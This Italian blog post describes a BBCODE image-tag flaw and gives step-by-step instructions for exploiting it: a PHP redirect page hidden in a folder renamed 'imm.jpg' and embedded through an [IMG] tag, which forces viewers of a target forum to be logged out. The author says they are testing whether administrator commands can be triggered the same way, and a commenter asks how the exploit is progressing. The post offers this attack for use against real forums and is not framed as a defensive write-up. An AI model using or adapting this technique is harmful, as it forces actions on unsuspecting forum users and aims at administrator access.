Bug in BBCODE

E’ stato da poco scoperto un Bug del BBCODE (più precisamente del TAG IMG) che permetterebbe di far eseguire una pagina in PHP, anche se non con tutte le funzioni.

Per sfruttarlo basta fare così:

1– Crea sul tuo host una cartella chiamata immagine

2– Al suo interno crea una pagina con questo codice:
< ?php header("Location: http://www.sitovittima.it/forum/login.php?logout=true"); exit; ?>

3– Salvatela nella cartella creata al passo 1 con il nome di index.php

4– Rinominate la cartella come “imm.jpg”. Si avete letto bene proprio .jpg!!!

5– Andate sul forum o sul sito che supporta il BBCODE e inserite questo codice:
[IMG]http://tuohost/imm.jpg[/IMG]

Bene se tutto funziona, fidatevi che funziona, vi vedrete non più loggati al prossimo refresh.
Stò provando diversi link per vedere se si riesce a far eseguire dei comandi da amministratore.

About Mello

Facente funzione di farsi i cazzi suoi!
This entry was posted in Security Center. Bookmark the permalink.

One Response to Bug in BBCODE

  1. Ciuov says:

    Lo sviluppo dell’expoit come procede??

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *